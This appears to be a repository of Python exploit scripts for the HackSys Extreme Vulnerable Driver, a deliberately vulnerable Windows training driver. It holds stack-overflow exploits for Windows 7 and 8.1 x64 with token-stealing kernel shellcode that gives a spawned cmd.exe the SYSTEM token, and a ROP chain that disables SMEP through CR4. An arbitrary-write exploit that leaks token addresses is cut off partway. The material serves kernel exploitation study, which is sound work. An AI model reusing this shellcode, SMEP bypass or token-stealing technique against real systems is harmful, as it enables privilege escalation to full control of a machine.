├── README.md
├── Win7x64
    └── HEVD-stack-overflow.py
└── Win8.1x64
    ├── HEVD-stack-overflow.py
    └── HEVD-arbitrary-write.py


/README.md:
--------------------------------------------------------------------------------
1 | # HEVD-Exploits
2 | 


--------------------------------------------------------------------------------
/Win7x64/HEVD-stack-overflow.py:
--------------------------------------------------------------------------------
  1 | # HackSys Extreme Vulnerable Driver
  2 | # Stack buffer overflow exploit
  3 | # Target: Windows 7 SP1 64-bit
  4 | # Author: Brian Beaudry
  5 | 
  6 | from ctypes import *
  7 | from ctypes.wintypes import *
  8 | import sys, struct, time
  9 | 
 10 | # Define bitmasks
 11 | CREATE_NEW_CONSOLE = 0x00000010
 12 | GENERIC_READ = 0x80000000
 13 | GENERIC_WRITE = 0x40000000
 14 | OPEN_EXISTING = 0x00000003
 15 | FILE_ATTRIBUTE_NORMAL = 0x00000080
 16 | FILE_DEVICE_UNKNOWN = 0x00000022
 17 | FILE_ANY_ACCESS = 0x00000000
 18 | METHOD_NEITHER = 0x00000003
 19 | MEM_COMMIT = 0x00001000
 20 | MEM_RESERVE = 0x00002000
 21 | PAGE_EXECUTE_READWRITE = 0x00000040
 22 | 
 23 | HANDLE = c_void_p
 24 | LPTSTR = c_void_p
 25 | LPBYTE = c_char_p
 26 | 
 27 | # Define WinAPI shorthand
 28 | CreateProcess = windll.kernel32.CreateProcessW # <-- Unicode version!
 29 | VirtualAlloc = windll.kernel32.VirtualAlloc
 30 | CreateFile = windll.kernel32.CreateFileW # <-- Unicode version!
 31 | DeviceIoControl = windll.kernel32.DeviceIoControl
 32 | 
 33 | class STARTUPINFO(Structure):
 34 |     """STARTUPINFO struct for CreateProcess API"""
 35 | 
 36 |     _fields_ = [("cb", DWORD),
 37 |                 ("lpReserved", LPTSTR),
 38 |                 ("lpDesktop", LPTSTR),
 39 |                 ("lpTitle", LPTSTR),
 40 |                 ("dwX", DWORD),
 41 |                 ("dwY", DWORD),
 42 |                 ("dwXSize", DWORD),
 43 |                 ("dwYSize", DWORD),
 44 |                 ("dwXCountChars", DWORD),
 45 |                 ("dwYCountChars", DWORD),
 46 |                 ("dwFillAttribute", DWORD),
 47 |                 ("dwFlags", DWORD),
 48 |                 ("wShowWindow", WORD),
 49 |                 ("cbReserved2", WORD),
 50 |                 ("lpReserved2", LPBYTE),
 51 |                 ("hStdInput", HANDLE),
 52 |                 ("hStdOutput", HANDLE),
 53 |                 ("hStdError", HANDLE)]
 54 | 
 55 | class PROCESS_INFORMATION(Structure):
 56 |     """PROCESS_INFORMATION struct for CreateProcess API"""
 57 | 
 58 |     _fields_ = [("hProcess", HANDLE),
 59 |                 ("hThread", HANDLE),
 60 |                 ("dwProcessId", DWORD),
 61 |                 ("dwThreadId", DWORD)]
 62 | 
 63 | def procreate():
 64 |     """Spawn shell and return PID"""
 65 | 
 66 |     print "[*]Spawning shell..."
 67 |     lpApplicationName = u"c:\\windows\\system32\\cmd.exe" # Unicode
 68 |     lpCommandLine = u"c:\\windows\\system32\\cmd.exe" # Unicode
 69 |     lpProcessAttributes = None
 70 |     lpThreadAttributes = None
 71 |     bInheritHandles = 0
 72 |     dwCreationFlags = CREATE_NEW_CONSOLE
 73 |     lpEnvironment = None
 74 |     lpCurrentDirectory = None
 75 |     lpStartupInfo = STARTUPINFO()
 76 |     lpStartupInfo.cb = sizeof(lpStartupInfo)
 77 |     lpProcessInformation = PROCESS_INFORMATION()
 78 |     
 79 |     ret = CreateProcess(lpApplicationName,    # _In_opt_      LPCTSTR
 80 |                         lpCommandLine,        # _Inout_opt_   LPTSTR
 81 |                         lpProcessAttributes,  # _In_opt_      LPSECURITY_ATTRIBUTES
 82 |                         lpThreadAttributes,   # _In_opt_      LPSECURITY_ATTRIBUTES
 83 |                         bInheritHandles,      # _In_          BOOL
 84 |                         dwCreationFlags,      # _In_          DWORD
 85 |                         lpEnvironment,        # _In_opt_      LPVOID
 86 |                         lpCurrentDirectory,   # _In_opt_      LPCTSTR
 87 |                         byref(lpStartupInfo),        # _In_          LPSTARTUPINFO
 88 |                         byref(lpProcessInformation)) # _Out_         LPPROCESS_INFORMATION
 89 |     if not ret:
 90 |         sys.exit("[-]Error spawning shell: " + FormatError())
 91 | 
 92 |     time.sleep(1) # Make sure cmd.exe spawns fully before shellcode executes
 93 | 
 94 |     print "[+]Spawned with PID: %d" % lpProcessInformation.dwProcessId
 95 |     return lpProcessInformation.dwProcessId
 96 | 
 97 | def gethandle():
 98 |     """Open handle to driver and return it"""
 99 | 
100 |     print "[*]Getting device handle..."
101 |     lpFileName = u"\\\\.\\HackSysExtremeVulnerableDriver" # Unicode
102 |     dwDesiredAccess = (GENERIC_READ | GENERIC_WRITE)
103 |     dwShareMode = 0
104 |     lpSecurityAttributes = None
105 |     dwCreationDisposition = OPEN_EXISTING
106 |     dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
107 |     hTemplateFile = None
108 | 
109 |     handle = CreateFile(lpFileName,             # _In_     LPCTSTR
110 |                         dwDesiredAccess,        # _In_     DWORD
111 |                         dwShareMode,            # _In_     DWORD
112 |                         lpSecurityAttributes,   # _In_opt_ LPSECURITY_ATTRIBUTES
113 |                         dwCreationDisposition,  # _In_     DWORD
114 |                         dwFlagsAndAttributes,   # _In_     DWORD
115 |                         hTemplateFile)          # _In_opt_ HANDLE
116 |     if not handle or handle == -1:
117 |         sys.exit("[-]Error getting device handle: " + FormatError())
118 | 
119 |     print "[+]Got device handle: 0x%x" % handle
120 |     return handle
121 | 
122 | def ctl_code(function,
123 |              devicetype = FILE_DEVICE_UNKNOWN,
124 |              access = FILE_ANY_ACCESS,
125 |              method = METHOD_NEITHER):
126 |     """Recreate CTL_CODE macro to generate driver IOCTL"""
127 |     return ((devicetype << 16) | (access << 14) | (function << 2) | method)
128 | 
129 | def shellcode(pid):
130 |     """Craft our shellcode and stick it in a buffer"""
131 | 
132 |     tokenstealing = (
133 |         #
134 |         # Token stealing shellcode based on
135 |         # http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation
136 |         # Extended to swap tokens on remote process (cmd.exe) and then
137 |         # return back to a parent function.
138 |         #
139 |         ####DEBUG####
140 |         #"\xcc"
141 |         ####DEBUG####
142 |         "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"	# mov rdx, [gs:188h]    ;get _ETHREAD pointer from KPCR
143 |         "\x4C\x8B\x42\x70"			# mov r8, [rdx+70h]     ;_EPROCESS (see PsGetCurrentProcess function)
144 |         "\x4D\x8B\x88\x88\x01\x00\x00"		# mov r9, [r8+188h]     ;ActiveProcessLinks list head
145 |         "\x49\x8B\x09"				# mov rcx, [r9]         ;follow link to first process in list
146 | 						#find_system_proc:
147 |         "\x48\x8B\x51\xF8"			# mov rdx, [rcx-8]      ;offset from ActiveProcessLinks to UniqueProcessId
148 |         "\x48\x83\xFA\x04"			# cmp rdx, 4            ;process with ID 4 is System process
149 |         "\x74\x05"				# jz found_system	;found SYSTEM token
150 | 	"\x48\x8B\x09"				# mov rcx, [rcx]        ;follow _LIST_ENTRY Flink pointer
151 |         "\xEB\xF1"				# jmp find_system_proc	;loop
152 | 						#found_system:
153 |         "\x48\x8B\x81\x80\x00\x00\x00"		# mov rax, [rcx+80h]    ;offset from ActiveProcessLinks to Token
154 |         "\x24\xF0"				# and al, 0f0h          ;clear low 4 bits of _EX_FAST_REF structure
155 |         "\x49\x8B\x09"				# mov rcx, [r9]		;continue down the list
156 | 						#find_cmd_proc:
157 |         "\x48\x8B\x51\xF8"			# mov rdx, [rcx-8]	;offset to PID
158 |         "\x48\x81\xFA" + struct.pack("<I", pid) + # cmp rdx, 0xXXXX	;PID of cmd.exe?
159 |         "\x74\x05"				# jz found_cmd		;found cmd.exe
160 |         "\x48\x8B\x09"				# mov rcx, [rcx]	;next list item
161 |         "\xEB\xEE"                              # jmp find_cmd_proc   	;loop
162 | 						#found_cmd:
163 |         "\x48\x89\x81\x80\x00\x00\x00"          # mov [rcx+80h], rax	;copy SYSTEM token to remote process's token
164 |                                                 #return:
165 |         "\x48\x83\xc4\x28"                      # add rsp, 28h		;return address to parent frame
166 |         "\xc3")                                 # ret
167 | 
168 |     print "[*]Allocating buffer for shellcode..."
169 |     lpAddress = None
170 |     dwSize = len(tokenstealing)
171 |     flAllocationType = (MEM_COMMIT | MEM_RESERVE)
172 |     flProtect = PAGE_EXECUTE_READWRITE
173 |     
174 |     addr = VirtualAlloc(lpAddress,         # _In_opt_  LPVOID
175 |                         dwSize,            # _In_      SIZE_T
176 |                         flAllocationType,  # _In_      DWORD
177 |                         flProtect)         # _In_      DWORD
178 |     if not addr:
179 |         sys.exit("[-]Error allocating shellcode: " + FormatError())
180 | 
181 |     print "[+]Shellcode buffer allocated at: 0x%x" % addr
182 | 
183 |     # put de shellcode in de buffer and shake it all up
184 |     memmove(addr, tokenstealing, len(tokenstealing))
185 |     return addr
186 | 
187 | def trigger(hDevice, dwIoControlCode, scAddr):
188 |     """Create evil buffer and send IOCTL"""
189 | 
190 |     inBuffer = create_string_buffer("A" * 2056 + struct.pack("<Q", scAddr))
191 | 
192 |     print "[*]Triggering vulnerable IOCTL..."
193 |     lpInBuffer = addressof(inBuffer)
194 |     nInBufferSize = 2064
195 |     lpOutBuffer = None
196 |     nOutBufferSize = 0
197 |     lpBytesReturned = byref(c_ulong())
198 |     lpOverlapped = None
199 |     
200 |     pwnd = DeviceIoControl(hDevice,             # _In_        HANDLE
201 |                            dwIoControlCode,     # _In_        DWORD
202 |                            lpInBuffer,          # _In_opt_    LPVOID
203 |                            nInBufferSize,       # _In_        DWORD
204 |                            lpOutBuffer,         # _Out_opt_   LPVOID
205 |                            nOutBufferSize,      # _In_        DWORD
206 |                            lpBytesReturned,     # _Out_opt_   LPDWORD
207 |                            lpOverlapped)        # _Inout_opt_ LPOVERLAPPED
208 |     if not pwnd:
209 |         sys.exit("[-]Error: Not pwnd :(\n" + FormatError())
210 | 
211 | if __name__ == "__main__":
212 |     print "\n**HackSys Extreme Vulnerable Driver**"
213 |     print "***Stack buffer overflow exploit***\n"
214 | 
215 |     pid = procreate()
216 |     trigger(gethandle(), ctl_code(0x800), shellcode(pid)) # ugly lol


--------------------------------------------------------------------------------
/Win8.1x64/HEVD-stack-overflow.py:
--------------------------------------------------------------------------------
  1 | # HackSys Extreme Vulnerable Driver
  2 | # Stack buffer overflow exploit
  3 | # Target: Windows 8.1 64-bit
  4 | # Author: Brian Beaudry
  5 | 
  6 | from ctypes import *
  7 | from ctypes.wintypes import *
  8 | from time import sleep
  9 | import sys, struct
 10 | 
 11 | # Define bitmasks/constants
 12 | CREATE_NEW_CONSOLE = 0x00000010
 13 | GENERIC_READ = 0x80000000
 14 | GENERIC_WRITE = 0x40000000
 15 | OPEN_EXISTING = 0x00000003
 16 | FILE_ATTRIBUTE_NORMAL = 0x00000080
 17 | FILE_DEVICE_UNKNOWN = 0x00000022
 18 | FILE_ANY_ACCESS = 0x00000000
 19 | METHOD_NEITHER = 0x00000003
 20 | MEM_COMMIT = 0x00001000
 21 | MEM_RESERVE = 0x00002000
 22 | PAGE_EXECUTE_READWRITE = 0x00000040
 23 | HANDLE = c_void_p
 24 | LPTSTR = c_void_p
 25 | LPBYTE = c_char_p
 26 | 
 27 | # Define WinAPI shorthand
 28 | CreateProcess = windll.kernel32.CreateProcessW # <-- Unicode version!
 29 | VirtualAlloc = windll.kernel32.VirtualAlloc
 30 | EnumDeviceDrivers = windll.psapi.EnumDeviceDrivers
 31 | CreateFile = windll.kernel32.CreateFileW # <-- Unicode version!
 32 | DeviceIoControl = windll.kernel32.DeviceIoControl
 33 | 
 34 | class STARTUPINFO(Structure):
 35 |     """STARTUPINFO struct for CreateProcess API"""
 36 | 
 37 |     _fields_ = [("cb", DWORD),
 38 |                 ("lpReserved", LPTSTR),
 39 |                 ("lpDesktop", LPTSTR),
 40 |                 ("lpTitle", LPTSTR),
 41 |                 ("dwX", DWORD),
 42 |                 ("dwY", DWORD),
 43 |                 ("dwXSize", DWORD),
 44 |                 ("dwYSize", DWORD),
 45 |                 ("dwXCountChars", DWORD),
 46 |                 ("dwYCountChars", DWORD),
 47 |                 ("dwFillAttribute", DWORD),
 48 |                 ("dwFlags", DWORD),
 49 |                 ("wShowWindow", WORD),
 50 |                 ("cbReserved2", WORD),
 51 |                 ("lpReserved2", LPBYTE),
 52 |                 ("hStdInput", HANDLE),
 53 |                 ("hStdOutput", HANDLE),
 54 |                 ("hStdError", HANDLE)]
 55 | 
 56 | class PROCESS_INFORMATION(Structure):
 57 |     """PROCESS_INFORMATION struct for CreateProcess API"""
 58 | 
 59 |     _fields_ = [("hProcess", HANDLE),
 60 |                 ("hThread", HANDLE),
 61 |                 ("dwProcessId", DWORD),
 62 |                 ("dwThreadId", DWORD)]
 63 | 
 64 | def procreate():
 65 |     """Spawn shell and return PID"""
 66 | 
 67 |     print "[*]Spawning shell..."
 68 |     lpApplicationName = u"c:\\windows\\system32\\cmd.exe" # Unicode
 69 |     lpCommandLine = u"c:\\windows\\system32\\cmd.exe" # Unicode
 70 |     lpProcessAttributes = None
 71 |     lpThreadAttributes = None
 72 |     bInheritHandles = 0
 73 |     dwCreationFlags = CREATE_NEW_CONSOLE
 74 |     lpEnvironment = None
 75 |     lpCurrentDirectory = None
 76 |     lpStartupInfo = STARTUPINFO()
 77 |     lpStartupInfo.cb = sizeof(lpStartupInfo)
 78 |     lpProcessInformation = PROCESS_INFORMATION()
 79 |     
 80 |     ret = CreateProcess(lpApplicationName,    # _In_opt_      LPCTSTR
 81 |                         lpCommandLine,        # _Inout_opt_   LPTSTR
 82 |                         lpProcessAttributes,  # _In_opt_      LPSECURITY_ATTRIBUTES
 83 |                         lpThreadAttributes,   # _In_opt_      LPSECURITY_ATTRIBUTES
 84 |                         bInheritHandles,      # _In_          BOOL
 85 |                         dwCreationFlags,      # _In_          DWORD
 86 |                         lpEnvironment,        # _In_opt_      LPVOID
 87 |                         lpCurrentDirectory,   # _In_opt_      LPCTSTR
 88 |                         byref(lpStartupInfo),        # _In_          LPSTARTUPINFO
 89 |                         byref(lpProcessInformation)) # _Out_         LPPROCESS_INFORMATION
 90 |     if not ret:
 91 |         print "\t[-]Error spawning shell: " + FormatError()
 92 |         sys.exit(-1)
 93 | 
 94 |     sleep(1) # Make sure cmd.exe spawns fully before shellcode executes
 95 | 
 96 |     print "\t[+]Spawned with PID: %d" % lpProcessInformation.dwProcessId
 97 |     return lpProcessInformation.dwProcessId
 98 | 
 99 | def shellcode(pid):
100 |     """Craft our shellcode and stick it in a buffer"""
101 | 
102 |     tokenstealing = (
103 |         #
104 |         # Token stealing shellcode based on
105 |         # http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation
106 |         # Extended to swap tokens on remote process (cmd.exe) and then
107 |         # return back to a parent function.
108 |         #
109 |         ####DEBUG####
110 |         #"\xcc"
111 |         ####DEBUG####
112 |         "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"	# mov rdx, [gs:188h]    ;get _ETHREAD pointer from KPCR
113 |         "\x4C\x8B\x82\xB8\x00\x00\x00"		# mov r8, [rdx+b8h]     ;_EPROCESS (see PsGetCurrentProcess function)
114 |         "\x4D\x8B\x88\xe8\x02\x00\x00"		# mov r9, [r8+2e8h]     ;ActiveProcessLinks list head
115 |         "\x49\x8B\x09"				# mov rcx, [r9]         ;follow link to first process in list
116 | 						#find_system_proc:
117 |         "\x48\x8B\x51\xF8"			# mov rdx, [rcx-8]      ;offset from ActiveProcessLinks to UniqueProcessId
118 |         "\x48\x83\xFA\x04"			# cmp rdx, 4            ;process with ID 4 is System process
119 |         "\x74\x05"				# jz found_system	;found SYSTEM token
120 |         "\x48\x8B\x09"				# mov rcx, [rcx]        ;follow _LIST_ENTRY Flink pointer
121 |         "\xEB\xF1"				# jmp find_system_proc	;loop
122 | 						#found_system:
123 |         "\x48\x8B\x41\x60"      		# mov rax, [rcx+60h]    ;offset from ActiveProcessLinks to Token
124 |         "\x24\xF0"				# and al, 0f0h          ;clear low 4 bits of _EX_FAST_REF structure
125 |         "\x49\x8B\x09"				# mov rcx, [r9]		;continue down the list
126 | 						#find_cmd_proc:
127 |         "\x48\x8B\x51\xF8"			# mov rdx, [rcx-8]	;offset to PID
128 |         "\x48\x81\xFA" + struct.pack("<I", pid) + # cmp rdx, 0xXXXX	;PID of cmd.exe?
129 |         "\x74\x05"				# jz found_cmd		;found cmd.exe
130 |         "\x48\x8B\x09"				# mov rcx, [rcx]	;next list item
131 |         "\xEB\xEE"                              # jmp find_cmd_proc   	;loop
132 | 						#found_cmd:
133 |         "\x48\x89\x41\x60"                      # mov [rcx+60h], rax	;copy SYSTEM token to remote process's token
134 |                                                 #return:
135 |         "\x48\x8B\x5C\x24\x58"                  # mov rbx, [rsp+58h]    ;restore IRP
136 |         "\x48\x83\xc4\x10"                      # add rsp, 10h
137 |         "\xc3"                                  # ret
138 |         )
139 | 
140 |     print "[*]Allocating buffer for shellcode..."
141 |     lpAddress = None
142 |     dwSize = len(tokenstealing)
143 |     flAllocationType = (MEM_COMMIT | MEM_RESERVE)
144 |     flProtect = PAGE_EXECUTE_READWRITE
145 |     
146 |     addr = VirtualAlloc(lpAddress,         # _In_opt_  LPVOID
147 |                         dwSize,            # _In_      SIZE_T
148 |                         flAllocationType,  # _In_      DWORD
149 |                         flProtect)         # _In_      DWORD
150 |     if not addr:
151 |         print "\t[-]Error allocating shellcode: " + FormatError()
152 |         sys.exit(-1)
153 | 
154 |     print "\t[+]Shellcode buffer allocated at: 0x%x" % addr
155 | 
156 |     # put de shellcode in de buffer and shake it all up
157 |     memmove(addr, tokenstealing, len(tokenstealing))
158 |     return addr
159 | 
160 | def get_base():
161 |     """
162 |     Get kernel base address.
163 | 
164 |     This function uses psapi!EnumDeviceDrivers which is only callable
165 |     from a non-restricted caller (medium integrity or higher). Also the
166 |     assumption is made that the kernel is the first array element returned."""
167 | 
168 |     print "[*]Enumerating kernel base address..."
169 |     
170 |     array = c_ulonglong * 1024
171 |     lpImageBase = array()
172 |     cb = sizeof(lpImageBase)
173 |     lpcbNeeded = c_long()
174 | 
175 |     res = EnumDeviceDrivers(byref(lpImageBase), # _Out_ LPVOID
176 |                             cb,                 # _In_  DWORD
177 |                             byref(lpcbNeeded))  # _Out_ LPDWORD
178 |     if not res:
179 |         print "\t[-]Unable to get kernel base: " + FormatError()
180 |         sys.exit(-1)
181 | 
182 |     print "\t[+]Got kernel base: 0x%x" % lpImageBase[0]
183 |     
184 |     return lpImageBase[0]
185 | 
186 | def build_rop(krnlBase, scAddr):
187 |     """Build ROP chain with offsets of kernel base for disabling SMEP."""
188 | 
189 |     filler = "AAAAAAAA"
190 |     rop = (
191 |         (filler * 257) +
192 |         #(filler * 25) + #DEBUG
193 |         struct.pack("<Q", krnlBase+0x20b29) +   # pop rcx ; ret
194 |         struct.pack("<Q", 0x406f8) +            # (popped into rcx)
195 |         struct.pack("<Q", krnlBase+0x8655a) +   # mov cr4, ecx ; ret
196 |         struct.pack("<Q", scAddr))              # (return into shellcode)
197 |         
198 |     return rop
199 | 
200 | def gethandle():
201 |     """Open handle to driver and return it"""
202 | 
203 |     print "[*]Getting device handle..."
204 |     lpFileName = u"\\\\.\\HackSysExtremeVulnerableDriver" # Unicode
205 |     dwDesiredAccess = (GENERIC_READ | GENERIC_WRITE)
206 |     dwShareMode = 0
207 |     lpSecurityAttributes = None
208 |     dwCreationDisposition = OPEN_EXISTING
209 |     dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
210 |     hTemplateFile = None
211 | 
212 |     handle = CreateFile(lpFileName,             # _In_     LPCTSTR
213 |                         dwDesiredAccess,        # _In_     DWORD
214 |                         dwShareMode,            # _In_     DWORD
215 |                         lpSecurityAttributes,   # _In_opt_ LPSECURITY_ATTRIBUTES
216 |                         dwCreationDisposition,  # _In_     DWORD
217 |                         dwFlagsAndAttributes,   # _In_     DWORD
218 |                         hTemplateFile)          # _In_opt_ HANDLE
219 |     if not handle or handle == -1:
220 |         print "\t[-]Error getting device handle: " + FormatError()
221 |         sys.exit(-1)
222 | 
223 |     print "\t[+]Got device handle: 0x%x" % handle
224 |     return handle
225 | 
226 | def ctl_code(function,
227 |              devicetype = FILE_DEVICE_UNKNOWN,
228 |              access = FILE_ANY_ACCESS,
229 |              method = METHOD_NEITHER):
230 |     """Recreate CTL_CODE macro to generate driver IOCTL"""
231 |     return ((devicetype << 16) | (access << 14) | (function << 2) | method)
232 | 
233 | def trigger(hDevice, dwIoControlCode, rop):
234 |     """Create evil buffer and send IOCTL"""
235 | 
236 |     inBuffer = create_string_buffer(rop)
237 | 
238 |     print "[*]Triggering vulnerable IOCTL..."
239 |     lpInBuffer = addressof(inBuffer)
240 |     nInBufferSize = sizeof(inBuffer)+1
241 |     lpOutBuffer = None
242 |     nOutBufferSize = 0
243 |     lpBytesReturned = byref(c_ulong())
244 |     lpOverlapped = None
245 |     
246 |     pwnd = DeviceIoControl(hDevice,             # _In_        HANDLE
247 |                            dwIoControlCode,     # _In_        DWORD
248 |                            lpInBuffer,          # _In_opt_    LPVOID
249 |                            nInBufferSize,       # _In_        DWORD
250 |                            lpOutBuffer,         # _Out_opt_   LPVOID
251 |                            nOutBufferSize,      # _In_        DWORD
252 |                            lpBytesReturned,     # _Out_opt_   LPDWORD
253 |                            lpOverlapped)        # _Inout_opt_ LPOVERLAPPED
254 |     if not pwnd:
255 |         print "\t[-]Error: Not pwnd :(\n" + FormatError()
256 |         sys.exit(-1)
257 | 
258 | if __name__ == "__main__":
259 |     print "\n**HackSys Extreme Vulnerable Driver**"
260 |     print "***Stack buffer overflow exploit***\n"
261 | 
262 |     pid = procreate() # launch shell
263 |     sc = shellcode(pid) # allocate shellcode
264 |     base = get_base() # get kernel base address
265 |     rop = build_rop(base, sc) # build rop chain
266 |     handle = gethandle() # get handle to driver
267 |     ioctl = ctl_code(0x800) # get vulnerable IOCTL
268 | 
269 |     trigger(handle, ioctl, rop) # do the deed


--------------------------------------------------------------------------------
/Win8.1x64/HEVD-arbitrary-write.py:
--------------------------------------------------------------------------------
  1 | from ctypes import *
  2 | from ctypes.wintypes import *
  3 | from os import getpid
  4 | from argparse import ArgumentParser
  5 | 
  6 | # Define bitmasks/constants
  7 | TOKEN_READ = 0x00020008
  8 | SYSTEM_EXTENDED_HANDLE_INFORMATION = 0x00000040
  9 | GENERIC_READ = 0x80000000
 10 | GENERIC_WRITE = 0x40000000
 11 | OPEN_EXISTING = 0x00000003
 12 | FILE_ATTRIBUTE_NORMAL = 0x00000080
 13 | FILE_DEVICE_UNKNOWN = 0x00000022
 14 | FILE_ANY_ACCESS = 0x00000000
 15 | METHOD_NEITHER = 0x00000003
 16 | PROCESS_ALL_ACCESS = 0x001F0FFF
 17 | PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000
 18 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000
 19 | CREATE_NEW_CONSOLE = 0x00000010
 20 | ENTRIES = 0x00006000
 21 | # "ENTRIES" probably needs to be adjusted on other systems/architectures.
 22 | # I arrived at this number by upping the value until NtQuerySystemInformation
 23 | # stopped returning STATUS_INFO_LENGTH_MISMATCH. If this is set too high
 24 | # it can crash the python process.
 25 | PVOID = LPVOID
 26 | PULONG = c_void_p
 27 | LPTSTR = c_void_p
 28 | LPBYTE = c_char_p
 29 | SIZE_T = c_size_t
 30 | 
 31 | # Define WinAPI shorthand
 32 | GetCurrentProcess = windll.kernel32.GetCurrentProcess
 33 | OpenProcessToken = windll.advapi32.OpenProcessToken
 34 | NtQuerySystemInformation = windll.ntdll.NtQuerySystemInformation
 35 | CreateFile = windll.kernel32.CreateFileW # <-- Unicode version!
 36 | DeviceIoControl = windll.kernel32.DeviceIoControl
 37 | OpenProcess = windll.kernel32.OpenProcess
 38 | InitializeProcThreadAttributeList = windll.kernel32.InitializeProcThreadAttributeList
 39 | UpdateProcThreadAttribute = windll.kernel32.UpdateProcThreadAttribute
 40 | CreateProcess = windll.kernel32.CreateProcessW # <-- Unicode version!
 41 | 
 42 | class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
 43 |     """Create the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure."""
 44 |     _fields_ = [("Object", PVOID),
 45 |                 ("UniqueProcessId", PVOID),
 46 |                 ("HandleValue", PVOID),
 47 |                 ("GrantedAccess", ULONG),
 48 |                 ("CreatorBackTraceIndex", USHORT),
 49 |                 ("ObjectTypeIndex", USHORT),
 50 |                 ("HandleAttributes", ULONG),
 51 |                 ("Reserved", ULONG)]
 52 |   
 53 | class SYSTEM_HANDLE_INFORMATION_EX(Structure):
 54 |     """Create the SYSTEM_HANDLE_INFORMATION structure."""
 55 |     _fields_ = [("NumberOfHandles", PVOID),
 56 |                 ("Reserved", PVOID),
 57 |                 ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * ENTRIES)]
 58 |                 # The * ENTRIES makes "Handles" an array (ctypes doc 15.17.1.13)
 59 | 
 60 | class WRITE_WHAT_WHERE(Structure):
 61 |     """Create the WRITE_WHAT_WHERE structure."""
 62 |     _fields_ = [("What", PULONG),
 63 |                 ("Where", PULONG)]
 64 | 
 65 | class STARTUPINFO(Structure):
 66 |     """Create the STARTUPINFO structure."""
 67 |     _fields_ = [("cb", DWORD),
 68 |                 ("lpReserved", LPTSTR),
 69 |                 ("lpDesktop", LPTSTR),
 70 |                 ("lpTitle", LPTSTR),
 71 |                 ("dwX", DWORD),
 72 |                 ("dwY", DWORD),
 73 |                 ("dwXSize", DWORD),
 74 |                 ("dwYSize", DWORD),
 75 |                 ("dwXCountChars", DWORD),
 76 |                 ("dwYCountChars", DWORD),
 77 |                 ("dwFillAttribute", DWORD),
 78 |                 ("dwFlags", DWORD),
 79 |                 ("wShowWindow", WORD),
 80 |                 ("cbReserved2", WORD),
 81 |                 ("lpReserved2", LPBYTE),
 82 |                 ("hStdInput", HANDLE),
 83 |                 ("hStdOutput", HANDLE),
 84 |                 ("hStdError", HANDLE)]
 85 | 
 86 | class PROC_THREAD_ATTRIBUTE_ENTRY(Structure):
 87 |     """Create the PROC_THREAD_ATTRIBUTE_ENTRY structure."""
 88 |     _fields_ = [("Attribute", DWORD),
 89 |                 ("cbSize", SIZE_T),
 90 |                 ("lpValue", PVOID)]
 91 | 
 92 | class PROC_THREAD_ATTRIBUTE_LIST(Structure):
 93 |     """Create the PROC_THREAD_ATTRIBUTE_LIST structure."""
 94 |     _fields_ = [("dwFlags", DWORD),
 95 |                 ("Size", ULONG),
 96 |                 ("Count", ULONG),
 97 |                 ("Reserved", ULONG),
 98 |                 ("Unknown", PULONG),
 99 |                 ("Entries", PROC_THREAD_ATTRIBUTE_ENTRY * 1)]
100 |                 # The * 1 makes "Entries" an array (ctypes doc 15.17.1.13)
101 | 
102 | class STARTUPINFOEX(Structure):
103 |     """Create the STARTUPINFOEX structure."""
104 |     _fields_ = [("StartupInfo", STARTUPINFO),
105 |                 ("lpAttributeList", PVOID)]
106 | 
107 | class PROCESS_INFORMATION(Structure):
108 |     """Create the PROCESS_INFORMATION structure."""
109 |     _fields_ = [("hProcess", HANDLE),
110 |                 ("hThread", HANDLE),
111 |                 ("dwProcessId", DWORD),
112 |                 ("dwThreadId", DWORD)]
113 | 
114 | def getprocesstoken():
115 |     """Retrieve the current process token's memory address."""
116 |     ProcessHandle = HANDLE(GetCurrentProcess())
117 |     DesiredAccess = TOKEN_READ
118 |     TokenHandle = HANDLE()
119 |     if not OpenProcessToken(ProcessHandle,       # _In_  HANDLE
120 |                             DesiredAccess,       # _In_  DWORD
121 |                             byref(TokenHandle)): # _Out_ PHANDLE
122 |         raise WinError()
123 | 
124 |     SystemInformationClass = SYSTEM_EXTENDED_HANDLE_INFORMATION
125 |     SystemInformation = SYSTEM_HANDLE_INFORMATION_EX()
126 |     SystemInformationLength = sizeof(SystemInformation)
127 |     ReturnLength = None
128 |     if NtQuerySystemInformation(SystemInformationClass,    # _In_      SYSTEM_INFORMATION_CLASS
129 |                                 byref(SystemInformation),  # _Inout_   PVOID
130 |                                 SystemInformationLength,   # _In_      ULONG
131 |                                 ReturnLength):             # _Out_opt_ PULONG
132 |         print "\nNtQuerySystemInformation failed (check 'ENTRIES' variable)"
133 |         print "ENTRIES = {:#x}".format(ENTRIES)
134 |         raise WinError()
135 |             
136 |     pid = getpid()
137 |     # Iterate through SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX structures
138 |     for entry in SystemInformation.Handles:
139 |         if entry.UniqueProcessId == pid and \
140 |            entry.HandleValue == TokenHandle.value:
141 |             print "[*]Token Address: {:#x}".format(entry.Object)
142 |             return entry.Object
143 | 
144 |     # If we've come this far, something went wrong :(
145 |     print "\nToken not found :("
146 |     raise WinError()
147 | 
148 | def gethandle():
149 |     """Open handle to driver and return it."""
150 |     lpFileName = u"\\\\.\\HackSysExtremeVulnerableDriver" # Unicode
151 |     dwDesiredAccess = (GENERIC_READ | GENERIC_WRITE)
152 |     dwShareMode = 0
153 |     lpSecurityAttributes = None
154 |     dwCreationDisposition = OPEN_EXISTING
155 |     dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
156 |     hTemplateFile = None
157 |     handle = CreateFile(lpFileName,             # _In_     LPCTSTR
158 |                         dwDesiredAccess,        # _In_     DWORD
159 |                         dwShareMode,            # _In_     DWORD
160 |                         lpSecurityAttributes,   # _In_opt_ LPSECURITY_ATTRIBUTES
161 |                         dwCreationDisposition,  # _In_     DWORD
162 |                         dwFlagsAndAttributes,   # _In_     DWORD
163 |                         hTemplateFile)          # _In_opt_ HANDLE
164 |     if not handle or handle == -1:
165 |         raise WinError()
166 | 
167 |     return handle
168 | 
169 | def ctl_code(function,
